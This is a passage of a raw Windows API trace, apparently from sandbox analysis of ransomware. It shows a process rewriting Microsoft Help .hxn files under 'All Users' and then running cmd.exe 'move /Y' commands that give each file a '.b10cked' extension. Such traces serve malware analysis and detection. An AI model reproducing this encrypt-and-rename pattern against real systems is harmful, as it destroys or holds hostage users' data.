lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x13a [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.372] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0x9c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0x9c, lpOverlapped=0x0) returned 1 [0198.373] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.373] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0x9c, lpOverlapped=0x0) returned 1 [0198.373] SetFilePointer (in: hFile=0x120, lDistanceToMove=-156, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9e [0198.373] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0x9c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0x9c, lpOverlapped=0x0) returned 1 [0198.373] SetFilePointer (in: hFile=0x120, lDistanceToMove=-156, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9e [0198.373] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0x9c, lpOverlapped=0x0) returned 1 [0198.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OIS.14.1033.hxn", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0198.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OIS.14.1033.hxn", cchWideChar=18, lpMultiByteStr=0x1328794, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.OIS.14.1033.hxn", lpUsedDefaultChar=0x0) returned 18 [0198.377] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x13a [0198.378] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.378] CloseHandle (hObject=0x120) returned 1 [0198.378] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN") returned 0x27 [0198.379] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.380] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x6fc, dwThreadId=0xdcc)) returned 1 [0198.393] CloseHandle (hObject=0x1b4) returned 1 [0198.393] CloseHandle (hObject=0x120) returned 1 [0198.393] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.393] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.393] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.393] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.393] ReleaseMutex (hMutex=0xf8) returned 1 [0198.393] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.393] ReleaseMutex (hMutex=0xf8) returned 1 [0198.393] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.393] ReleaseMutex (hMutex=0xf8) returned 1 [0198.393] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.393] ReleaseMutex (hMutex=0xf8) returned 1 [0198.393] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.400] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25518989107) returned 1 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x152 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x152 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.402] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0198.406] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.406] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0198.406] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0198.407] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0198.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0198.407] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0198.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.ONENOTE.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0198.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.ONENOTE.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.ONENOTE.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0198.410] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x152 [0198.411] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.411] CloseHandle (hObject=0x120) returned 1 [0198.411] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN") returned 0x27 [0198.412] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.412] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd2c, dwThreadId=0x70c)) returned 1 [0198.579] CloseHandle (hObject=0x1b4) returned 1 [0198.579] CloseHandle (hObject=0x120) returned 1 [0198.579] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.579] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.579] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.579] ReleaseMutex (hMutex=0xf8) returned 1 [0198.579] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.579] ReleaseMutex (hMutex=0xf8) returned 1 [0198.579] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.579] ReleaseMutex (hMutex=0xf8) returned 1 [0198.579] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.579] ReleaseMutex (hMutex=0xf8) returned 1 [0198.579] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25536980031) returned 1 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x152 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x152 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: 